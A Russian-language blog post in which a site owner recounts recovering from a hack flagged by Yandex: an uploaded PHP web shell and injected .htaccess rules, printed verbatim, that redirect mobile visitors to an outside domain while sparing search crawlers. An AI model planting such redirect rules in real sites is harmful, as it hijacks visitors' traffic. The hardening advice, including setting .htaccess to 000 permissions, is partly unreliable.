Сайт может угрожать безопасности вашего компьютера...
Что же делать? Где искать причину такой назойливой для пользователя надписи от Yandex? Неужели Ваш любимый сайт взломали?
Не все так страшно. В большинстве случаев, Yandex оказывается прав в том, что сайт может угрожать безопасности, но на самом деле он с той же вероятность абсолютно не угрожает ей. В чем причина такой пугающей надписи и потери трафика из самого крупного поискового гиганта российскоязычной аудитории глобальных интерактивных сетей?
Если Вы так сказать попали под фильтр безопасности, то прежде всего Вы теряете пользователей, так как большинство из них (около 90%) не зайдут к Вам из-за предупреждения об опасности. Поэтому необходимо в кратчайшие сроки предпринять действия по обезвреживанию опасности (как это называет Яндекс).
Проблема может быть довольно проста: некий бот или злоумышленник, совершая поиск уязвимостей, находит какую-то дверь для того, чтобы осуществить один из имеющихся у него видов атаки на конкретную жертву.
После чего, он совершает какие-то действия, который позволяют ему получить желаемый результат.
В моем случаем это было изменение файла htaccess, так как все остальное я постарался максимально защитить и избавить сайт от возможной атаки.
Каким именно образом человеку удалось изменить этот файл? Все очень просто. Находится "дыра" в коде, с помощью которой можно залить shell. Затем уже в зависимости от того какие цели у взломщика, производятся махинации с Вашим сайтом. Преступник получает полный доступ ко ВСЕМ файлам, лежащим на сервере. Если бы я был на его месте, то скорее всего скопировал бы себе все содержимое, или хотя бы критически важные файлы - конфигурацию, htpasswd и другие. Поэтому ЕСЛИ ВЫ ОБНАРУЖИЛИ измененный htaccess, то немедленно измените его в исходное положение, скопируйте ВСЕ файлы ВСЕХ папок себе на компьютер, например, используя FileZilla. При этом ЖЕЛАТЕЛЬНО, чтобы у Вас был установлен ESET Smart Security последней версии с актуальными базами антивирусных сигнатур.
ВАЖНО! Срочно измените пароль к базе данных и ftp, если обнаружили подобную атаку. Так как скорее всего пароль к базе у Вас лежит в корневом файле configuration.php или подобном, поэтому легко можно получить доступ КО ВСЕЙ базе данных сайта.
Во время копирования файлов внимательно следите за тем, что антивирус Вам сообщает. В моем случае была такая проблема:
Защита в режиме реального времени файл D:\**\demo\last\8.jpg.php PHP/WebShell.NAH троянская программа очищен удалением - изолирован ** Событие произошло в новом файле, созданном следующим приложением: D:\**\programms\filezilla.exe.
Преступник может накопировать shell в разные каталоги с разным именем, поэтому искать что-то типа shell.php в большинстве случаев - глупо.
Естественно, я написал в Яндекс, через их обратную связь, которую очень сложно найти, что у меня не может быть вирусов и это какая-то ошибка. Но потом, прочитав их же советы по обезвреживанию, нашел дописанную информацию в своем файле в корне сайта htaccess:
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://sn-update.com/s/8196 [L,R=302]
* эти строки направляют поисковики, мобильные устройства, боты на сайт http://sn-update.com/s/8196, который в свою очередь также перенаправляет на другой сайт весь Ваш трафик, кроме стационарных компьютеров, с которых чаще всего сидят администраторы сайтов и ни о чем не подозревают.
Все лишнее я удалил и поставил права на htaccess 000!!!!!!!!!!! Внимание, если Вы выставляете права на любой файл 444, то его можно изменить ВНОВЬ, если снова залить shell! Поэтому выставляйте права на этот файл 000! Так как такая защита уровнем выше и обойти её очень сложно. Для того, чтобы изменить этот файл Вам понадобится залезть в панель управления хостингом и выставить там атрибуты 444 или другие. Поэтому злоумышленник не сможет (100% гарантии нет) изменить файл htaccess повторно, если на нем стоят 000 права. Если Ваш хостинг не позволяет менять права ДАЖЕ на 444, то смело уходите к thehost.com.ua
На всякий случай, с помощью поиска по содержимому, также попытайтесь отыскать слова в файлах типа: eval, base64 и т.п.
На всякий случай посмотрел содержимое страницы сайта (Source code), содержимое index.php, но там тоже все было ровно. Решил еще убедиться и через прокси-сервер зашел на свой сайт, со включенным JavaScript и убедился в чистоте кода.
Ради интереса нашел в интернете пару сайтов онлайн-антивирусов, проверил свой сайт ими - все было замечательно.
Итак, сайт могут взломать не как угодно...
Безопасности Вам. С уважением.